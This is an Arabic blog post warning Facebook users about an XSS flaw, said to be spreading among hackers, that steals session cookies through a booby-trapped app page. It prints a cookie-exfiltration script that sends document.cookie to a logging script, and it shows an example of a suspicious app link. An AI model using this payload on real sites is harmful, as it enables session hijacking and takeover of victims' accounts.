تحدير من ثغر ة امنية على الفيسوك تمكن المهاجم من سرقة كوكيز الضحية


السلام عليكم هناك ثغرة تنتشر بشكل كبير بين الهاكرز العرب وتتمثل في ثغرة إكس إس إس تمكن المهاجم من سرقة كوكيز الضحية بمجرد دخوله إلى تطبيق الافبمل لصفحة معينة ، وذلك عبر إستخدام المهاجم للكود الاتي في صفحة الملغومة
<SCRIPT>location.href='localhost/1/log.php?cookie='+escape(document.cookie)</SCRIPT>

الثغرة والتي تم تطبيقها بنجاح ، تجعل اي متصفح لشبكة الإجتماعية فيسبوك امام خطر حقيقي وهو سرقة معلومات الكوكيز والتي يمكن للمهاجم من إذخال معلومات الكوكيز الخاصة بالضحية في متصفح المهاجم ليمكنه من دخول حسابه . لهذا المرجوا الإنتباه من اي رابط شبيه بالاتي
https://www.facebook.com/?v=app_4949752878

كما نرجوا من المتابعين نشر هذا التحذير لتقليص عدد الضحايا  

ليست هناك تعليقات:

إرسال تعليق